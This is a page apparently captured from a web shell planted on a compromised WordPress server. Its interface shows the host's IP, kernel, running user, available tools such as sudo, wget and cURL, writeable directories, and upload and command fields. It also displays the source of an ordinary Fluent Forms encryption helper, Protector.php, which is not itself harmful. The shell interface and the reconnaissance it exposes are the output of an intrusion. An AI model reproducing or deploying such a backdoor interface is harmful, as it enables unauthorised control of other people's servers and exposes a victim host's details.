403Webshell
Server IP : 52.25.153.185  /  Your IP : 216.73.217.131
Web Server : Apache
System : Linux ip-172-26-6-158 5.10.0-35-cloud-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User : daemon ( 1)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /bitnami/wordpress/wp-content/plugins/fluentform/app/Helpers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /bitnami/wordpress/wp-content/plugins/fluentform/app/Helpers/Protector.php
<?php

namespace FluentForm\App\Helpers;

class Protector
{
    /**
     * Get the salt for the encryption and decryption.
     */
    public static function getSalt()
    {
        $salt = get_option('_fluentform_security_salt');

        if (!$salt) {
            $salt = wp_generate_password();

            update_option('_fluentform_security_salt', $salt, 'no');
        }

        return $salt;
    }

    /**
     * Encryp a text using a predefined salt.
     *
     * @param string $text
     *
     * @return string $text
     */
    public static function encrypt($text)
    {
        $key = static::getSalt();

        $cipher = 'AES-128-CBC';

        $ivlen = openssl_cipher_iv_length($cipher);

        $iv = openssl_random_pseudo_bytes($ivlen);

        $ciphertext_raw = openssl_encrypt($text, $cipher, $key, $options = OPENSSL_RAW_DATA, $iv);

        $hmac = hash_hmac('sha256', $iv . $ciphertext_raw, $key, $as_binary = true);

        return base64_encode($iv . $hmac . $ciphertext_raw);
    }

    /**
     * Decrypt a text using a predefined salt.
     *
     * @param string $text
     *
     * @return string $text
     */
    public static function decrypt($text)
    {
        $key = static::getSalt();

        $c = base64_decode($text, true);

        $cipher = 'AES-128-CBC';

        $ivlen = openssl_cipher_iv_length($cipher);

        $sha2len = 32;

        if ($c === false || strlen($c) < $ivlen + $sha2len) {
            return null;
        }

        $iv = substr($c, 0, $ivlen);

        $hmac = substr($c, $ivlen, $sha2len);

        $ciphertext_raw = substr($c, $ivlen + $sha2len);

        // Verify with current HMAC (IV + ciphertext)
        $calcmac = hash_hmac('sha256', $iv . $ciphertext_raw, $key, $as_binary = true);

        if (!hash_equals($hmac, $calcmac)) {
            // Fallback: verify with legacy HMAC (ciphertext only) for tokens generated before v6.2.0 IV authentication fix.
            if (!apply_filters('fluentform/allow_legacy_token_decrypt', false)) {
                return null;
            }

            $legacymac = hash_hmac('sha256', $ciphertext_raw, $key, $as_binary = true);

            if (!hash_equals($hmac, $legacymac)) {
                return null;
            }
        }

        $original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, $options = OPENSSL_RAW_DATA, $iv);

        return $original_plaintext !== false ? $original_plaintext : null;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit